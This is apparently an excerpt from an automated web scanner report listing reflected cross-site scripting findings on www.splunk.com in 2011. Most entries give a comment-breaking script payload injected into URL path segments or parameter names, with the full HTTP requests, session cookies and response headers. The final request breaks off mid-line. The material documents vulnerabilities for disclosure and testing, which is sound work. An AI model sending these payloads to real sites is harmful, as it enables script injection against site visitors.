The value of REST URL parameter 1 is copied into an HTML comment. The payload 7b5fc--><script>alert(1)</script>f57001f10c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view7b5fc--><script>alert(1)</script>f57001f10c5/benefits/SP-CAAACCS HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:33 GMT; path=/ ETag: d73159ade34a23a6ff7bfc893c9667cd1296944073 Last-Modified: Sat, 05 Feb 2011 22:14:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1a047--><script>alert(1)</script>60a40edd839 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/benefits1a047--><script>alert(1)</script>60a40edd839/SP-CAAACCS HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:06 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:06 GMT; path=/ ETag: eeec607825549ba0d5b647d9dcf9e23d1296944107 Last-Modified: Sat, 05 Feb 2011 22:15:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 276aa--><script>alert(1)</script>d1fc95e74a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/benefits/SP-CAAACCS276aa--><script>alert(1)</script>d1fc95e74a3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:40 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:40 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:40 GMT; path=/ ETag: 15661cf4c768ab99722c9d0cf5b106361296944140 Last-Modified: Sat, 05 Feb 2011 22:15:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.526. http://www.splunk.com/view/benefits/SP-CAAACCS [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/benefits/SP-CAAACCS
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3026b--><script>alert(1)</script>e2ce8ffbb79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/benefits/SP-CAAACCS?3026b--><script>alert(1)</script>e2ce8ffbb79=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 41f62084b25cf5cc695cda4f5daea6ed1296944038 Last-Modified: Sat, 05 Feb 2011 22:13:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 216fd--><script>alert(1)</script>bcbccd79d54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view216fd--><script>alert(1)</script>bcbccd79d54/business-analytics/SP-CAAAFXH HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:02 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:02 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:02 GMT; path=/ ETag: 33b50f47a85ee6840d607386e53546cd1296944163 Last-Modified: Sat, 05 Feb 2011 22:16:03 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 554ca--><script>alert(1)</script>600f61871ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/business-analytics554ca--><script>alert(1)</script>600f61871ef/SP-CAAAFXH HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:30 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:30 GMT; path=/ ETag: 0a427f120f19924b275e763c5e9862cb1296944191 Last-Modified: Sat, 05 Feb 2011 22:16:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 58755--><script>alert(1)</script>93df2ca7ad8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/business-analytics/SP-CAAAFXH58755--><script>alert(1)</script>93df2ca7ad8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.530. http://www.splunk.com/view/business-analytics/SP-CAAAFXH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/business-analytics/SP-CAAAFXH
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5ce8a--><script>alert(1)</script>273eeac0383 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/business-analytics/SP-CAAAFXH?5ce8a--><script>alert(1)</script>273eeac0383=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d6fec--><script>alert(1)</script>6766303683c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewd6fec--><script>alert(1)</script>6766303683c/careers/SP-CAAAAGG HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6c606--><script>alert(1)</script>25166e88644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/careers6c606--><script>alert(1)</script>25166e88644/SP-CAAAAGG HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload cba06--><script>alert(1)</script>5161bd1b4b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/careers/SP-CAAAAGGcba06--><script>alert(1)</script>5161bd1b4b3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.534. http://www.splunk.com/view/careers/SP-CAAAAGG [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/careers/SP-CAAAAGG
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 267a6--><script>alert(1)</script>4fc3c5eb99e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/careers/SP-CAAAAGG?267a6--><script>alert(1)</script>4fc3c5eb99e=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; 